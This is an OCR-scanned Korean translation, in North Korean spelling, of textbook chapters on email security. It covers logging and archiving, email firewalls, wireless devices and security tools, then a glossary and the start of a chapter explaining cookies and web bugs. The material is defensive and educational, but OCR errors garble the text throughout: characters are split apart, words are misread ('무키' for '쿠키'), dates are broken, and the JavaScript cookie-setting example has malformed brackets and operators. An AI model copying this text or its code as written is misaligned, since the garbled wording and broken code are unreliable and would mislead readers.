사적비밀，자료보전，암호화에 관한 법의 테두리내에서 다음의 정보들이 고려되여야 한다 
는것을 알아야 한다. 

방책과 절차는 최소한《적합한》기간 전자우편체계의 기록을 보전하도록 수립되여 
야 한다. 임의의 전자우편체계는 정상적으로 매 통보문의 발신자，수신자，크기，접수 및 
배포시간 등을 기록한다. 많은 전자우편봉사기들은 기록되는 정보의 량과 형태를 조종하 
는 선택적인 기록설정들을 가진다. 가능한껏 다음의 설정들이 조사를 요구하는 가장 신 
중한 정 보를 기 륵하기 위 하여 시험되 고 설정 되 여 야 한다. 

• 임의의 통보문에 대한 실제적인 발신원천의 지적 ( “ From ” 마당과 관계없이)한다. 
가능하면 인증된 사용자를 포함한다. 통보문을 제출하는 워크스테이션이나 봉사 
기의 이름이 나 망주소는 교차적인 지적 이 나 발신자인증을 확증하는 자료로서 중 
요하다. 만일 통보문을 보내는 를퓨터사용자가 여럿이라면 통보문전송에 어떤 
구좌가 리용되 는가. 

• 통보문에서 기본내용 혹은 다른 머리부들은 개별적통보문들을 식별하는데서 그 
리 고 여 러 전 자우편봉사기 와 체 계 들을 통과하는 경 로설 정 에 서 결 정 적 이 다. 

• 부착물의 내용류형과 이름(례: customers.doc — 응용프로그람/ ms - word ， ” 
nudie . jpeg ” 一화상 / jpeg 등)도 도움이 된다. 

또한 일부 전자우편체계들은 여벌의 통보문들을 복사해 두도록 한다. 이 복사본들은 
가능하면 완전한 내용을 보존한다. 일부 체계들은 체계를 통하여 전송되는 모든 통보문 
들을 기록해 두는가 하면 다른 일부 체 계들은 발신자/수신자주소 또는 령역，우선권，크 
기 또는 다른 요인에 따라 어느 통보문을 보관할것인가를 나타내는 조종인자들을 가지고 
있 다. 만일 보관특성 이 유용하다면 전자우편체 계 들에 보충적 인 큰 보관장소를 분배하며 
따라서 기관적 인 요구，우선권，예산들을 결정하고 잠재적 인 보안요구와 균형을 맞추는것 
이 필요할것이다. 

보관특성 이 유용하지 못한 체계들의 경우에는 통보문의 복사를 허용함으로써 자동적 
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으로 생성되여 접수자에게 전달(계획하지 않은)되도록 한다(대표적으로 이것은 bcc 또는 
auto-forward 특성 들이 다.). 이 특성 들은 모든 사용자들에 게 사용될수 있을만큼 효과적 인 
것 이 못되며 따라서 그것들은 일반적 으로 새 로운 조사에만 유용하다. 

만일 조사가 요구되 면 봉사기기 록이 나 기 록된 통보문들을 검 색하는데 효과적 인 검 색 
또는 보고도구가 없이 수집된 정 보를 통하여 엄밀한 조사를 진행하는것은 불가능하다. 
이 미전에 나온 필요한 도구들을 습득하고 조사하는것 이 제 일 현명하다. 도구들의 기 능은 
검증되여야 하며 결국 그 도구들과 친숙해 지면 귀중한 시간을 절약할수 있을것이다. 

일부 기관들에서는 전자우편의 개인적사용이 종업원의 특전이외의 다른 아무것으로 
도 되지 않는다. 만일 기관의 방책이 전자우편의 사용을 공적인 사업에 국한시킨다면 개 
인적인 사용은 봉사의 도난으로 간주된다. 이 런 경우 사용자들의 사용방식(동료와의 사 
업상 련관이 없는 전자서 신거 래 즉 오락，체 육, 롱담목록들로부터 통보문을 받는것)이 나 
내 용의 류형(다매 체 一화상，비 데오，오디 오，게 임 등)들을 탐지하여 야 할 필요성 이 제 기된 
다. 그러나 전자우편봉사기체계는 전형적으로 기능성과 융통성이 있게 설계되지 내용을 
제 한하게끔 설계되지는 않는다. 사용방식을 감시 하는 능력 은 전적 으로 봉사기기록파일의 
우편처리에 국한된다. 내용류형에 따르는 전송흐름의 감시，려과，기록 또는 보존능력은 
리용할수 없 다. 

이 런 특성들을 제 공하기 위하여 설계 되는 전자우편중계제품 및 봉사는 쓸모 있다. 
일반적으로 전자우편방화벽이 라는것은 보통의 방화벽이 망계층인것과는 반대로 그 과정 
이 응용프로그람계 층에 서 진행 되 는것 이 다(그것 이 전형 적 으로 제 공하는 여 러 가지 특성 들 
은 이 장의 뒤부분에서 설명한다.). 이 전자우편방화벽들이 사용되는 경우 여러 측면에서 
효과적 일수 있지만 일반적으로 그것들은 봉사기사이를 통과하는 통보문들에 국한되며 전 
형적 으로 내부전자우편체계 와 인터네 트사이의 경계 에 설 치된다. 갈은 봉사기의 각이한 
사용자들사이 에 오가는 통보문들은 전적 으로 내적 으로 처 리되며 이 장치들에 의하여 조 
사될수 없다. 


무선 보안 


전 자우편접 속에 서 제 일 최 근에 새 톱게 개 발된것 은 무선 자료통신 이 다.《 무선》이 라는 
말이 하나의 단일한 범 주로 자주 론의 되 고 있지 만 여 러 가지 장치 들이 각이한 방법 으로 
각이한 형 태의 자료망들에서 인터네트에 호상접속을 위 한 여 러 기 술들과 함께 동작한다. 
주되는 보안우려는 전자우편자료가 전송도중에 무선련결상에서든 인터네트련결상에서든 
중간에 서 도청 당할수 있 다는것 이 다. 휴대 형호출기 를 제 외 하고 대 부분의 무선 자료장치 들 
은 무선련결시에 일정한 형태의 암호화를 한다. 봉사의 형태가 아주 다양하고 시장의 변 
화가 빠르므로 해 당한 특정봉사를 검 사하는것 이 필 요할것 이 다. 이 모든 장치 들은 일 부 
통보문경로조정에 대하여 인터네트를 리용하는데 이 경로조정부분은 고유한 의미에서 암 
호화를 지원하지 않는다. 

현재 의 무선장치 들중에 서 손 꼽히 는것들은 이 동전화，인터네 트모뎀， PDA , LAN 기 판， 
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퓨대 형호줄기 등이 다. 

수자식이동전화 망기술의 특성들이 다양하지만 이 장치들은 모두 초기에 수자식으로 
부호화된 두방향음성 전화호출신호를 전달할수 있게 끔 설계 된 망들을 리 용한다. 자료망을 
리용할 때 일단 신호가 무선전화탑에 도착하면 인터네트와 호상 접속하기 위하여 여러가 
지 방법들이 리용된다. 전자우편봉사는 다음과 갈은 두가지 방법으로 전화에 제공된다. 

• 첫째로，이동전화는 HTML 이나 WAPWeb 우편을 통하여 전자우편에 접근할수 있 
다. 이 접근방식은 이 Web 접근이 접속할 때 SSL 암호화를 지원하지 않는다는것 
을 제 외 한다면 보통의 인 터네 트접 근과 기 능적 으로 같다. 

• 둘째로，일부 무선전화봉사제공업체들은 전화에 하나의 전자우편구좌를 제공한 
다. 이 경우에 무선전화제공업체는 전자우편봉사기로 동작한다. 보통 이것은 이 
장치를 가진 사용자들이 일부 또는 모든 전자우편을 자기들의 국부구좌로부터 
이 동전화구좌로 자동전송하도록 설정하려 할수 있 다는 가능성 을 제 외 한다면 기 
관의 전자우편보안과 관계 없다. 자동전송되는 통보문들은 인터 네트로 암호화되 
지 않은채 로 전송된 다는것 을 명 심하여 야 한다. 

무■형콤퓨터 및 PDA ( WAN ) 용무선인테 dl 트모뎀, 무선모템내장 PDA , PDA 통합수자식이 

동전화 이 장치 들은 독립 적 인 무선망이 나 수자식이 동전화망을 다 리 용할수 있 다. 일 단 
자료가 인터네트상으로 무선망을 통하여 지나가면 자료는 암호화되지 않는다. 무릎형를 
퓨터 는 접 속에 우선 암호화를 리용하여 이 문제 를 극복할수 있지 만 PDA 용의 뢰기쏘프트 
웨어는 흔히 SSL 암호화를 할수 없다. 

무선 LAN 카드 여러가지 각이한 기술을 리용하는 이 장치들의 종류는 다양하다. 판매 
업체들의 문서에는 통보문이 암호화되여야 하는가 그리고 련결할 때 암호화가 가능 혹은 
실행으로 설정되여야 하는가 하는것이 밝혀 져 있어야 한다. 

무선전자우편특정장치 일 부 다른 기 능들이 특이하게 포함되 여 있지 만 기 본기 능은 전 
자우편통보문들을 주고받을수 있는것인데 암호화된 무선자료망이나 암호화되지 않은 휴 
대 형 소형 무선호출망을 리 용할수 있 다. 이 장치 들은 모두 무선장치 와 봉사제 공업 체 간의 
통신에 전용규약들을 사용한다. 그것들은 다음과 갈은 두가지 방식으로 동작한다. 

• 첫째 로，봉사제 공자는 장치 의 전용규약과 열린표준규약들 ( CMTP / POP / IMAP ) 사이 
에 서 미 리 설정된 전자우편호스트에 로 중계하는 관문을 제 공할수 있 다. 봉사는 
인터네트접속에 SSL 을 지 원할수 있고 지 원하지 않을수도 있으며 ASMTP 를 통 
하여 통보문을 제출하는 기능을 가지고 있을수도 있고 그렇지 않을수도 있다. 

• 둘째 로，봉사제 공자에 의하여 동작하는 하나의 전자우편봉사기 상의 장치 에 봉사 
제공자는 별도의 전자우편구좌를 제공할수 있다. 또한 한 기관내의 사용자들은 
자기의 일부 또는 모든 전자우편을 이 구좌에로 자동전송하려고 할수도 있다. 
그러면 자동전송되는 우편은 인터네트에서 이 구좌의 봉사기에로 암호화되지 않 
은채로 이동할것이다. 
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문자수자휴대형호출기와 두방향휴대형호출기 이 장치 들을 위 하여 봉사제 공업 체 는 휴대 

형호출기와 관련된 전자우편주소를 제공한다. 봉사제공업체의 봉사기가 그 주소에 대한 
전자우편 을 받으면 통보문은 표준적 으로 최 소본문형 태 로 분해 되 여 휴대 형 호출기 로 전송 
된 다. 무선통신은 전형 적 으로 암호화되 지 는 않는다. 두방향휴대 형 호출기 는 보통 단순한 
중계통보문을 보내는 방식을 취 한다. 

하나의 전 자우편구좌가 봉사제 공업 체 의 전 자우편봉사기 로 발송될 것 을 필 요로 하는 
접근방식을 사용하는 이 장치들에 대하여 인터네트상에서 정보가 암호화되지 않고 전송 
되므로 신중한 정보는 자동전송되지 않도록 주의를 돌려야 한다. 만일 자동전송이 충분 
히 선택적으로 설정될수 없다면 인터네트에로의 자동전송을 허락하지 말아야 한다. 

인터 네트를 통하여 기관의 전자우편봉사기에 접근하는 무선장치와 SSL 대화암호화보 
호가 리용되 지 않는 경 우 접 근을 막을것 인가 혹은 사용자가 인 터네 트로부터 전자우편봉 
사기 에 원격 으로 접 근하지 않는다고 믿 을것 인 가 하는것 을 결 정하는것 이 필 요하다. 


전자우편보안도구들 


이 론문을 작성할 때 (20()1 년 초)에 는 전자우편보안에 직 접 적 용할수 있는 기 본적 으로 
다음과 갈은 세 부류의 도구들이 있었다. 

전자우편 암호화체계들 이 장치들은 설정된 전자우편 봉사기들사이의 전송흐름을 암호 
화 및 복호화하는 전자우편중계 장치형 태 로서 흔히 쓸모 있 다. 현재 대 부분은 여 러 가지 
경 쟁 적 인 전자우편 암호화표준가운데 서 하나(기 본적 으로 S / MIMF 과 PGP ) 를 리 용하지 만 일 
부는 전용암호화체계를 사용한다. 

이 장치들은 잘 채용되지 않고 전자우편암호화에 대한 명백한 단일표준이 없으며 
PKI 기반에 여러가지 문제가 있음으로 하여 보통 일반적인 체계들사이나 혹은 협동기관 
들사이에서만 쓸수 있다. 

전자우편운용호환성을 가진 항비루스체계 전자우편봉사기 와 봉사기 판매업 체 들은 항비 
루스방지 의 필요성 을 인정 하기 는 하였 으나 일 반적 으로 항비 루스계 에 능란하지 는 못하다. 
대 부분의 경 우 봉사기 쏘프트웨 어제 조업 체 들은 통보문처 리 의 접 수와 배 포단계사이 에 통보 
문처 리 를 위한 API 를 제 공하는데 그 봉사기 쏘프트웨 어 제 조업 체 들중 하나 혹은 그이 상의 
항비 루스판매 업 체 들이 봉사기특정 제 품들을 많이 제 공한다. 또한 열린표준 ( SMTP ) 체 계 들 
의 통보문접수규약을 즉시 받아 들이도록 설계된 일부 전자우편항비루스봉사기 제품들 
도 있다. 

전자우편방화벽제품과 봉사 전자우편방화벽 제품과 봉사는 다 항비루스，반스팸 ( anti - 
spam ), 내 용려과(내 용탐색)，내 용류형 려 과(첨 부품이 름이 나 형태 람지)，통보문보관，사용방 
식 보고，우편접수거부자공시，봉사거부공격에 대처 한 적재제한，암호화，위조대응 ( anti - 
counterfeiting ), 위장대응 ( anti - spoofing ), 사용자감시 등을 포함하는 많은 결합기능들을 가 
질수 있다. 

암호화나 방화벽 제 품 또는 봉사를 리 용하도록 설 계하면 그것 이 적 용된 전자우편봉사 



기들사이에 어떻게 위치하겠는가를 평가하는것이 또한 필요하다. 단 하나의 봉사기만을 
가지 는 기 관들에 서 는 전자우편봉사기 와 인 터 네 트사이 에 중계 기 로 배 치 될수 있 다. 만일 
기관이 보호되여야 할 여러개의 봉사기들을 가지고 있을 때 전자우편경로조정에 방해를 
주지 않으면서 여러개의 봉사기들에 봉사를 제공하기 위하여서는 그것이 어떻게 배치되 
여야 하는가를 결정하는것이 중요할것이다. 

최신으로 갱신 


전자통신환경은 일반적으로 급속히 변한다. 매 판매업체들은 몇달에 한번씩 보안에 
영향을 줄수 있는 새로운 특징들이 있는 새로운 봉사기 및 의뢰기쏘프트웨어들을 내놓는 
다. 해커들과 보안전문가들은 정상적으로 현존 제품들의 우점과 약점들을 발견해 내며 
판매 업체들은 그 결함들을 극복한 보강프로그람 (patch) 들과 새로운 개정판들을 만들어 낸 
다. 한편 새로운 비루스들을 적극적으로 만들어 내는 자들도 숨어 있다. 이런 개발을 유 
지하려는 개별적사람들은 그 분야에 대한 자기의 지식을 정상적으로 갱신할 필요가 있다. 

최신의 보안과 비루스문제들에 대한 가장 좋은 정보원천은 일반적으로 인터네트의 
Web 싸이트 및 메 일링리스트들에서 찾아 볼수 있다(물론 써퍼 (surfer) 들도 그 원천을 평 
가하는것 이 중요하다.). 중요한것은 다음과 같다. 

• 름퓨터 비 상대 응림 (CERT:Computer Emergency Response Team): 일 반적 인 콤퓨터 보 
안문계들에 대하여 CERT 는 정기적으로 전자우편 및 비루스와 관련된것들을 포 
함하여 블레 찐을 발행한다. 

• 전자우편봉사기 및 의뢰기쏘프트웨어판매업체들은 보안문제들에 대한 정보의 중 
요한 원천이다. 

• 기 본 (rootshell)Web 싸이 트는 봉사를 방해 할수 있는 공격 들에 대 한 중요한 정 보를 
정기적으로 제공한다. 

항비루스쏘프트웨어의 판매업체들은 새로운 비루스들에 대한 시기적절한 정보를 주 
는 좋은 원천들이다. 자기의 판매 업체를 확인해보라. 많은 판매 업체들은 자기의 Web 싸이 
트에 접근할수 있는 권한을 제한하거 나 자기의 고객에 한해서만 메 일링리스트를 제공해 
준 다. 


요 약 


이 장에서는 기관환경에서 사용할 때 부닥치는 전자우편과 보안문제의 일반적인 
견해 를 주는데 초점 을 두었 다. 전자통신의 력 사적측면으로부터 시 작하여 본문에 서 는 
수많은 전자우편위험요소들을 조사하고 그 리 면에 기술적이며 조작상의 개 념들을 상 
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세히 서 술하였 으며 IT 기 관들이 그것 을 제 거하는데 리용할수 있는 도구와 응용프로그 
람들을 보여 주었 다. 또한 본문에 서 는 기 관에 서 무선보안을 실 시 하기 위한 전 략을 제 
공하였다. 


용어해설 


ARPAnet(Advanced Research Projects Agency NET work) 

선진연구계획기관 (ARPA) 에서 창설한 연구망이다. 오늘날 인터네트의 전신이다. 

DNS(Domain Name System) 

사용자들이 UNIX 망이 나 인터네트 (TCP/IP 망)에서 령 역이름을 리용하여 를퓨 
터 를 찾아 내 게 하는 이 름해 석 쏘프트웨어 이 다. 

IMAP(Internet Messaging Access Protocol) 

인터 네트상에서 널리 리용될것이 기대되는 표준우편봉사기 규약이다. IMAP 은 
사용자가 접속하여 내 리적재 할 때까지 들어 오는 전자우편을 잡아 두는 통보문보 
관고를 제 공한다. IMAP4 판이 가장 최 신판이다. 

MAPS(Mail Abuse Prevention System) 

RBL(Real time Blackhole List) 을 가지 고 스팸 을 제 거 하는 캘 리 포니 아에 있는 
한 비영 리기관. RBL 에는 스패머 의 IP 주소들이 있으므로 회사들과 ISP 들은 들어 
오는 우편을 거부하는데 그 목록을 사용할수 있다. 

ORBS(Open Relay Behavior modification System) 

대 량전자우편통보문의 제 3자(열린)중계 를 허 락하도록 확인된 SMTP 봉사기 들 
을 추적 하기 위한 자료기지 이 다. ORBS 는 MAPS 의 경 쟁대상이 다. 

PEM(Privacy Enhanced Mail) 

인터네트상의 안전한 전자우편표준. 이것은 암호화，수자식서명，수자식인증 
서 는 물론 비 공개 열 쇠 방식 과 공개 열 쇠 방식 을 다 지 원 한다. 

POP3(Post Office Protocol 3) 

보통 인터 네 트상에서 사용되 는 표준우편봉사기 규약. 이것 은 사용자가 접속하 
여 내 리 적재할 때 까지 들어 오는 전자우편을 잡아 두는 통보문보관고를 제공한다. 
POP3 은 선택성이 작은 단순체계이다. 모든 대기중 통보문과 부착물들은 동시에 
내 리적재 된다. POP3 는 SMTP 통신규약을 사용한다. 

S/MIME(Secure Multipurpose Internet Mail Extensions) 

인 터네 트전자우편을 통하여 비 본문파일 을 전송하기 위한 일 반방식 의 하나인 



데 그것 은 원래 ASCII 본문을 위한것이 였 다. S/MIME 는 비 밀 전송에 RSA 암호를 추 
가하는 MIME 이 판본이다. 

SMTP(Simple Mail Transfer Protocol) 

인터네 트상의 표준전자우편규약. 이것 은 통보문형식 과 통보문전송대 행 (MTA) 
을 정 의하는 TCP/IP 규약인데 전자우편을 보관하며 전송한다. 

SSL(Secure Sockets Layer) 

인 터네 트상의 주되 는 보안규약. 하나의 SSL 대 화가 시 작되 면 봉사기 는 자기 
공개열쇠를 열 람기 에 보내 는데 열 람기는 그것을 리용하여 우연적 으로 생성 되는 
비밀열쇠를 그 대화에 대한 비밀열쇠교환을 위하여 봉사기에 돌려 보낸다. 

TLS(Transport Layer Security) 

IETF 에서 제정된 보안규약인데 그것은 SSL 과 다른 규약을 혼합한것이다. 이 
것은 인터네 트상의 주요보안표준으로 기 대되 고 있으며 SSL 의 지위를 대 신하고 
있다. TLS 는 SSL 과 호환성 이 있으며 Triple DES 암호화를 사용한다. 

UBE(Unsolicited Bulk E-mail) 

요구와 허락없이 수많은 수신자들에게 보내지는 다량의 비요청전자우편. 다 
른 한편 스팸으로 알려 져 있다. 

VPN(Virtual Private Network) 

접근조종과 암호화를 통하여 개별망의 보안을 보장하는 공공망내에 구성되는 
개 별망으로써 대 형공공망들의 기 성운영 설 비 들의 효과적리용과 그에 의한 규모확 
장면 에 서 유리한 점 이 있 다. 

X.25 CCITT (현재 ITU) 

1970년대 초에 개 발되 여 1976년에 발표된 처 음으로 되 는 국제 적표준파케 트교 
환망. X.25 는 음성 을 위한 공중전화체계 와 류사하게 전 세계 적 인 범 용자료망으로 
설계되 였으나 비 호환성 과 무관심 성 으로 하여 그렇 게 되 지 못하였 다. 

X.400 

OSI 와 ITU 표준통신규약인데 응용프로그람계층규약 (OSI 모형에서 7계층). 
X.400 은 Ethernet, X.25, TCP/IP 전화회선을 포함하는 여 러가지 망전송에서 동작하 
도록 정의되였다. 
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제 1 4장. 쿠키와 Web Bug 란 무엇인가 


월리암 리 하딩 
애니타제이 리드 
로보트 엘 그레이 


쿠키 란 무엇 이 며 Web bug 란 무엇 인가. 이 무키 는 식 료상점 에서 흔히 볼수 있는 과자 
의 일종인 무키가 아니다. 오히려 무키는 월드와이드 Web 에서 찾아 보게 되는 Web 싸이트 
에 서 만들어 져 서 콤퓨터 의 하드구동기 에 전송되 는 특이한 작은 본문파일 이다. 주키 파일 
들은 인터네 트상에서 매 번 진행 되 는 마우스클리 크선택 들을 기 록한다. 어 떤 URL(Uniform 
Resource Locator) 을 건반으로 입력한 후에 열람기는 그 봉사기와 교신하여 특정 Web 싸이트 
를 화면에 연시해 줄것 을 요청한다. 열 람기 는 그 싸이트로부터의 쿠키파일 이 이 미 있는가 
를 알아 보기 위하여 하드구동기 를 검 색한다. 만일 사용자가 그 싸이 트를 이 미 전에 방문 
한적이 있다면 이미전에 무키파일에 기록된 특수한 식별코드가 확인되고 열람기는 그 쿠 
키파일 내 용을 그 싸이트에 되 돌려 보낼것 이 다. 봉사기 는 사용자가 이 미 전에 그 싸이 트를 
방문했을 때 실제로 선택했던것의 리력파일을 가지고 있다. 사용자는 이미전에 선택하였 
던것들이 화면상에서 강조되므로 쉽게 볼수 있다. 만일 사용자가 이 특별한 싸이트를 방 
문한것 이 처 음이 라면 正)가 할당되 고 이 초기 무키파일 은 하드구동기 에 보관된 다. 

Web bug 는 누가 Web 페 지 나 전자우편을 읽 고 있는가는 감시 할수 있도록 설계 된 Web 
폐 지 혹은 전자우편통보문상의 어 떤 도형 이다. Web bug 는 전자우편수신자가 정 보가 로출 
되는것을 바라든 바라지 않든 전자우편수신자의 IP(Internet Protocol) 주소를 제공할수 있 
다. Web bug 는 통보문이 얼마나 자주 전송되 여 읽혀 지는가 하는것과 관련된 정 보를 제 
공할수 있다. Web bug 의 다른 용도는 아래 에서 자세 히 설명 한다. 덧붙여 말하면 Web bug 
와 무키는 어떤 사람의 전자우편주소에 대하여 함께 사용될수 있으며 지어는 동기화될수 
도 있다. Web bug 는 무키의 리용과 관련하여 조사하여야 할 긍정적，부정적，위법적，비 
도덕적문제 들이 있다. 이 에 대 해서도 아래 에서 자세 히 설명한다. 

쿠키란 무엇인가 


몇해 전에 와서 야 쿠키 는 론의할만한 문제 로 되 였 다. 그러 나 이 미 언급하였지 만 식 료 
상점에서 볼수 있는 Oreos 나 Famous Amos 라는 이름이 붙은 그런 쿠키(즉 과자)를 이야 
기 하는것 은 아니 다. 이 쿠키 는 Web 싸이트와 콤퓨터 의 하드구동기 사이에 서 전송되 는 정 
보를 취급한다. 비록 무키 가 보다 대중적 인 화제로 되 고 있지만 자기 하드구동기 에 보관 
되 는 쿠키 를 알지 못하는 사용자들이 아직 많다. 무키 를 잘 알고 있는 사람들은 인 터네 
트의 사적 비 밀과 륜리문제 를 꺼 낸 다. Double Click, Inc 와 같은 많은 회 사들은 역 시 《 인 
터네 트회 사들이 너 무한가?》라는 질 문으로 그들에 대 해 소송을 제 기한다. 
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먼저 쿠키의 기초를 명백히 할 필요가 있다. Netscape 의 로우 몬랄리 (Lou Montalli ) 는 
1994년 에 무키 를 발명하였 다. 그때 쿠키 를 발명하게 한 유일 한 동기 는 직 결 장바구니 
(shopping basket ) 를 가능하게 하자는것 이 였 다. 그런데 이 름은 왜 《 쿠키》로 달았는가. 

《 쿠키 … 좋은가，나쁜가?》라는 기 사에 의하면 초기 에 해 커 들은 앤 디 월 리암즈 (Andy 
Williams ) 의 텔레비존극에서 용기를 얻었다고 한다. 《주키곰》이라는 토막극이 자주 방 
영되 였는데 거 기 에서 곰의 옷을 입 은 녀석 이 월 리암즈로부터 쿠키 를 앗아내 기 위하여 갖 
은 술책을 다 부린다. 월리암즈는 항상《주키가 없어. 이젠 없어. 더는 없어. … 정말 없 
어!》라고 소리를 지르면서 극을 끝마치군 하였다. 해커는 《무키곰》이라는 이름을 
달고 조종탁을 넘겨 받아《쿠키 달라》라는 통보문을 연시하여 메인프레임콤퓨터조작자 
들을 성 가시 게 굴었 다. 조작자가 건반으로 쿠키 라는 단어 를 입 력하면 쿠키 곰은 고맙다고 
응답을 하고야 그만두군 하였다.《주키》는 조작자의 기분만 상하게 할뿐이였다. 여기로 
부터 《 무키》라는 이 름이 유래되 였 다. 

쿠키의 내용 


무키를 처음 발견하였을 때 이 무키는 하드구동기의 정보를 조사해 내여 통과암호， 
신용카드번 호와 콤퓨터 의 쏘프트웨 어목록과 같은 상세한 개 인정 보를 수집한다는 풍설 이 
돌았다. 쿠키는 실행프로그람이 아니며 콤퓨터 에서 직 접적 으로 아무것도 할수 없다는것 
이 밝혀 지 자 이 런 풍문은 없어 지 게 되 였 다. 간단히 말하여 무키 는 Web 싸이 트에 의하 
여 만들어 지 고 를퓨터 의 하드구동기 에 전송되 는 작고 특수한 본문파일 이다. 그것 은 이 
름，값，종결날자，개시싸이트를 포함한다. 머 리부는 이 정보를 포함하며 열 람기가 그것을 
연시하기전에 문서로부터 삭제된다. 열람기에서 보기 또는 문서원천지령을 실행한다 하 
더라도 이 머리부를 볼수 없을것이다. 머리부는 무키가 만들어 질 때 그의 한 부분이다. 
하드구동기에 운반되면 머리부는 떨어 진다. 무키의 나머지 부분의 정보만이 봉사기와 
관련되며 그밖의것은 아무 상관도 없다. 

머리부의 한가지 실례를 들면 다음과 갈다. 

Set — Cookie : NAME = VALUE ; expires = DATE ; Path=PATH 

Domain = DOMAIN _ NAME ; secure 

NAME = VALUE 가 요구된다. NAME 은 무키의 이름이다. VALUE 는 사용자와는 관련 
이 없 으며 초기 에 봉사기 가 선택하여 보내 는 어 떤 값이 다. DATE 는 무키 가 얼 마만한 기 
간 하드구동기 에 존재할것 인 가를 결 정한다. 종결 날자가 없 으면 쿠키 는 Web 열 람기 를 끝 
낼 때 끝난다. DOMAm - NAME 은 무키를 보내고 열 람기가 그 봉사기로부터 파일을 요청 
할 때 이 쿠키의 복사본을 받을 봉사기의 주소이다. 그것은 쿠키가 유효한 도메인을 지 
정한다. PATH 는 무키 가 봉사기 에 다시 전송될 때 보충정 의하는데 사용되 는 속성 이 다. 
Secure 는 비밀통로가 리용되고 있을 때에만 쿠키가 전송된다는것을 지정한다. 



여러가지 형태의 많은 쿠키들이 사용된다. 가장 일반적인 형태는 방문자쿠키 (visitor 
cookie ) 라는것 이 다. 이 것은 어 떤 싸이 트에 몇 번 돌아 왔는가 하는 자리 길을 보존한다. 그 
것은 여러번 방문되는 페지의 Web 관리자에게 경고를 준다. 두번째 형태의 쿠키는 페지 
의 적재 방법 에 대 한 사용자들의 선택 값들을 보관하는 선택 쿠키 (preference cookie ) 이 다. 이 
것은 홈페지 주문화와 싸이트개 인화의 기 초이 다. 폐지 에는 어 느 색계통을 선택할것 인가 
또는 한번의 람색에 몇개의 결과가 좋은가 등을 실례로 들수 있다. 장바구니무키 
(shopping basket cookie ) 는 직 결 주문에 쓰이 는 대 중적 인 쿠키 이 다. 그것 은 무키 를 통하여 
사용자에 게 하나의 ID 값을 할당한다. 사용자가 항목들을 선택할 때 이 무키 는 봉사기 의 
正)파일에 있는 그 항목을 포함한다. 가장 유명하고 론할만한것은 추적무키(仕 acking 
cookie ) 이다. 이것은 장바구니무키를 닮았지만 항목들을 ID 파일에 첨부하는 대신에 방문 
한 싸이 트에 첨 부한다. 사람들의 물건을 사는 습관은 그들로 하여 금 목적하는 물건을 사 
는데로 마음이 쏠리게 한다. 회사들은 잠재적으로 사용자가 제공하는 전자우편을 보관하 
고 있다가 해당 사용자에 대하여 거두어 들인 정보에 기초하여 광고성전자우편을 보낼수 
있 다. 

쿠키는 자료가 돌아 다니고 있을 때에만 사용된다. 사용자가 열람기에서 어떤 URL 
을 건반으로 입 력한후 열 람기 는 그 봉사기 와 교신하고 해 당 Web 싸이 트를 요청한다. 열 
람기 는 그 싸이트로부터 의 쿠키파일 이 이 미 있는가 알기 위하여 콤퓨터 를 조사한다. 쿠 
키파일 이 발견되 면 열 람기 는 쿠키 의 모든 정 보를 그 URL 의 해 당 싸이 트에 보낸 다. 봉사 
기 가 그 정 보를 밤으면 해 당 사용자의 물건사기 나 검 색행동들을 찾아 내 는데 쿠키 를 곧 
리용할수 있 다. 아무런 무키 도 접 수되 지 않으면 해 당 사용자에 게 ID 가 할당되 고 다음번 
방문에 리용될수 있게 쿠키파일의 형태로 그 사용자의 콤퓨터에 전송된다. 

쿠키 는 단순히 본 문파일이 며 콤퓨터체 계 에서 편집 또는 삭제될수 있 다. Netscape 
Navigator 사용자들인 경우에 는 무키를 ( C:\program Files \ Netscape \ Users\default 또는 사용자 
이름 \ Cookie . txt ) 디렉터리에서 찾을수 있으며 Explorer 사용자들은 ( C :\ windows \ Cookies ) 에서 
cookies 라는 폴더 에 보관된 쿠키를 찾을수 있을것 이 다. 사용자들이 전체 쿠키폴더 또는 선 
택된 파일들을 삭제할 때 콤퓨터체계 에는 손상이 없다. Web 열 람기들은 쿠키를 받아 들이 
기전에 사용자들에게 경고를 보내는 선택사항들을 가진다. 게다가 www . download.com 에서 
찾을수 있는 Zero-Knowledge systems , Junkguard 등과 같이 사용자들이 쿠키 를 봉쇄 하도 
륵 하는 쏘프트웨어 들이 있 다. 

고급한 사용자들에 게 있어 서 무키 는 또한 Web 리 용을 개선하기 위한데 솜씨 있게 쓰 
일수 있다. 무키 는 본문문자렬로 보관되며 사용자들은 쿠키의 종결날자，령역，경 로를 편 
집 할수 있다. 실례로 Java Script 는 처 리 하기 편리한 문서객체의 쿠키속성을 만들어 낸다. 
무키는 문자렬이므로 다른 문자렬정수나 변수처 럼 문자렬객체의 메쏘드들과 속성들을 리 
용하여 조종될수 있다. 

쿠키는 비 록 간단한 본문파일 이지 만 무키를 설정 하고 봉사기와 의뢰 기사이에서 정 보 
를 앞뒤로 문제없이 보내도록 하는데는 일련의 스크립트서술이 필요하다. 아마 가장 일 
반적으로 쓰이는 언어는 Perl CGI 스크립트일것이다. 그러나 쿠키는 Java Script , Livewire , 
Active Server Pages 또는 VBScript 를 사용하여 서 도 만들수 있다. 

여기에 Java Script 무키의 실례를 하나 든다. 
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〈SCRIPT language = JavaScript > 

function setCookie < name , value , expires , path , domain , secure 〉{ 
document.cookie = name + ” =” + escape ( value ) + 

(( expires ) ? “; expires :” + expires : _0) + 

(( path ) ? “; path :” + path : _0) + 

(( domain ) ? “; domain =” + domain ; _0) + 

(( secure ) ? “; secure ” :_0); 

} 

</ SCRIPT > 

실례 에서 무키설계 는 다른 언어 로 서술되 였지 만 처 음에 고찰한 Perl CGI 스크립 트 
가 보다 일반적인데 그의 내용은 우와 같이 name - value 쌍들을 포함한다. 이 개개의 
스크립 트들은 자기 의 특수한 쿠키만을 설정 하고 정 정하는데 쓰이 며 내 용상으로는 아 
주 류사하다. 어느 스크립트를 사용할것인가 하는것은 작성자개인의 선택과 지식에 
달려 있다. 

사용자의 체 계 상에 서 쿠키 의 모양과 그 무키파일 로부터 무엇 을 알수 있는가 하는것 
을 실지로 판단할수 있는 가능성은 매우 제한적이며 쉽사리 안겨 오지 않는다. 사실 무 
키 상의 모든 정 보는 쿠키 를 설 정하는 봉사기 에 의 하여 서 만 정 확히 알수 있 다. 또한 대 부 
분의 경우 사용자가 직접 cookies . txt 파일이나 windows / cookies 디렉터리로부터 본문편집기 
를 씨서 그 파일들에 접근할 때 볼수 있는것은 해득할수 없는 수자나 콤퓨터잡음과 아주 
류사한것들이다. 그러나 Winmag . com 의 카렌 켄워씨 (Karen Kenworthy ) (고등형사프로그람 
